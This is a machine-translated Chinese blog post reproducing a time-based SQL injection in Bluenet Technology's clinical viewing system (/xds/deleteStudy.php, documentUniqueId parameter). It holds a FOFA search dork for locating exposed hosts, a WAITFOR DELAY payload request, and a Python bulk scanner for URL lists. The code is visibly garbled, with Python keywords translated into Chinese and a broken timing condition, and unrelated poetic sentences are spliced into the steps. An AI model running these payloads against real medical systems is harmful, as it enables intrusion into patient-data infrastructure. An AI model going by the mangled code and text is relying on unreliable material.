【漏洞复现】蓝网科技临床浏览系统——SQL注入(蓝网科技股份有限公司招聘)

【漏洞复现】蓝网科技临床浏览系统——SQL注入 声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。 文章目录 漏洞描述漏洞复现

免责声明:本文档或演示材料仅用于教育和教育目的,任何利用本文档中的信息进行非法活动的个人或组织与本文档的作者或发布者没有任何关系。

文章目录

漏洞描述漏洞复现测试工具

漏洞描述

Bluenet Technology 的临床查看系统1.2.1 中发现了一个漏洞。 /xds/deleteStudy.php接口的documentUniqueId参数存在SQL注入。

漏洞复现

1)信息收集

fofa:title=\’临床观察\’

我低头看着枯叶,听着雨落的声音。我站在毛毛细雨中,感受着倾盆大雨的悲伤。

2)数据库建设

GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:3%27– HTTP/1.1

主机:ip

时间延迟3秒,漏洞验证成功,存在SQL注入。

测试工具

麻子

#!/usr/bin/env Python

# -*-coding: utf-8 -*-

#导入需要的模块

导入http.client

导入SSL

导入参数解析

从urllib.parse 导入urlparse

导入时间

# 定义终端输出高亮的颜色代码

红色=\’\\033[91m\’\”

重置=\’\\033[0m\’

def check_vulnerability(url):

尝试:

# 解析URL并获取协议、域名和路径。

parsed_url=urlparse(url)

#构建用于检测SQL注入漏洞的URL路径

路径=parsed_url.path.rstrip(\’/\’) + \’/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:4%27–+\’

#根据URL协议创建HTTP或HTTPS连接

如果parsed_url.scheme==\’https\’:

# 忽略SSL 证书验证

conn=http.client.HTTPSConnection(parsed_url.netloc, context=ssl._create_unverified_context())

: 其他

conn=http.client.HTTPConnection(parsed_url.netloc)

# 记录请求的开始时间

开始时间=时间.time()

#发送GET请求

conn.request(\’GET\’, 路径)

# 获取响应

响应=conn.getresponse()

# 计算响应时间

经过的时间=time.time() – 开始时间

# 如果响应时间在3秒到6秒之间,则可能存在SQL注入漏洞。

3 6: 表示经过的时间

print(f\'{RED}URL [{url}]蓝网科技临床浏览系统可能存在SQL注入{RESET}\’)

: 其他

print(f\’URL [{url}] 不易受到攻击\’)

除了(http.client.HTTPException,ConnectionResetError)为e:

#请求失败时输出错误信息

print(f\’URL [{url}] 请求失败: {e}\’)

除了e:

#输出其他异常的错误信息

print(f\’URL [{url}] 中发生未知错误: {e}\’)

def main():

#创建参数解析器

parser=argparse.ArgumentParser(description=\’检测目标地址是否包含蓝网科技临床浏览系统的SQL注入\’)

#添加网址参数

parser.add_argument(\’-u\’, \’–url\’, help=\’指定目标地址\’)

# 添加文件参数来读取包含URL列表的文件

parser.add_argument(\’-f\’, \’–file\’, help=\’指定包含目标地址的文本文件\’)

# 解析命令行参数

args=parser.parse_args()

# 如果指定了URL参数

如果args.url:

# 如果URL 没有http 协议头,则添加http 协议头

第:章

args.url=\’http://\’ + args.url

# 检查URL 中是否存在漏洞

检查漏洞(args.url)

# 如果指定了文件参数

elif args.file:

# 读取文件中的URL列表

使用open(args.file, \’r\’) 作为file:

URL=file.read().splitlines()

对于URL urls:

# 如果URL 没有http 协议头,则添加http 协议头

第:章不是url.startswith(\’http://\’)也不是url.startswith(\’https://\’)

网址=\’http://\’+网址

# 检查每个URL 是否存在漏洞

检查漏洞(网址)

如果__name__==\’__main__\’:

# 程序入口

主要的()

运行截图

我正在做我想做的事。有些人欣赏我的自信,另一些人则说我值得信任。

以上#蓝网科技临床浏览系统【漏洞复现】——SQL注入相关内容来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93337.html

Like (0)
CSDN的头像CSDN
Previous 2024年7月6日
Next 2024年7月6日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注